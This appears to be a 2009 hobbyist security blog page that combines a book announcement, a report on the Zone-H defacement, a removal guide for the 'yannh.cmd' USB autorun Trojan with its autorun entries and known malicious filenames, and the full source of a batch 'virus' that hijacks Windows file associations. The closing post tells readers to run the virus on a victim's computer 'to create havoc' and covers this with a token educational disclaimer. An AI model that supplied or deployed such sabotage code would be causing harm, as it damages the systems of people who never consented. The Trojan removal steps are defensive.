I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 16 Reads and 26 Downloads with in 12 Minutes from the time of uploading in the popular Document uploading site http://www.scribd.com.
If you want to read the book online, you can check with this Link
You may also download and enjoy reading the book from the above given link.
http://www.Zone-H.org – considered as the Internet thermometer, that contains mirrors and archives of the defaced sites all around the world was hacked today at 11:43 am GMT wednessday Feb 11-2009.
It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was mentioned that they were bored, so the hackd the site to make fun.
Here i have enclosed the the snapshot how the defaced site (zone-h.org) looked like,
“yannh.cmd” is a Trojan that often spreads from external storage medias like USB, CD, DVD widely
by injecting into the autorun.inf file.
When i explored my autorun.inf, i found the few autorun entries made by “Yannh.cmd” like this,
open=yannh.cmd
shell\open\Command=yannh.cmd
shell\explore\Command=yannh.cmd
You can’t directly edit the autorun.inf file while it is currently running, another thing you have to notice is, this file attribute is set to read only mode, hence you have to revoke it first to proceed further.
How can i Identify whether my computer got infected ?
open up your command prompt and type
cd\
dir /a
dir /a – will clearly display all the hidden files in the drives.
This “Yannh.cmd” makes some registry entries in the following path…
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and has its source file in the system32 directory with the name Kamsoft.
Here are the ways that helps you get rid of this Trojan.
Step 1:
Its is always recommended to back-up your registry before touching it, after a successful backup,
goto the below path
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and delete Kamsoft.
Step 2:
Open up the command prompt and type the following
cd\
attrib -r -s -h yannh.cmd
del yannh.cmd
This will delete the yannh.cmd file.
Step 3:
Now you have to delete the kamsoft folder from your system32 directory, just type the below commands in the command prompt.
cd\
cd C:\WINDOWS\system32
attrib -r -s -h kamsoft.exe
del kamsoft.exe
Step 4:
Now you can edit the autorun.inf file to remove the entried added by yannh.cmd
cd\
attrib -r -h -s autorun.inf
edit attrib.inf
Now delete where ever it says yannh.cmd and save changes.
Now you are done with it.
Here are the similar files that you must be aware of,
refsanvn.inf
Zidan vs Tito.exe
desktop.exe
omsirutnarg.exe
Alisa.exe
blazzers.exe
burimi.exe
nfd.exe
repppp.exe
wax.exe
wny.exe
msv2008.exe
GETBOOTD.BAT
tbm9.bat
08dgu.com
1t6yxlxx.cmd
2h60k.cmd
3rl3lqbq.bat
ewatr.cmd
Maradona.exe
iw.bat
m2nl.bat
ov.cmd
pnt.com
t1ypkh.exe
grgarevn.inf
microsvn.inf
Installer.exe
fvbk.exe
snaoc9i.exe
bt8vuaw.com
wjlc.exe
6fnlpetp.exe
g8rruyw.exe
o1.com
Secret.exe
hupxj.bat
fphj6j31.bat
shell.exe
Here I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.
1. Open up a Notepad and copy and paste the below code.
Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
2. Save it with the extension .bat, and now you are ready to go….
3. Execute this on Victims computer to create havoc.
Its only you who is responsible for what you do with this…. we are not responsible for whatever you do with this… and it is only meant for educational means…
How it Works….
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….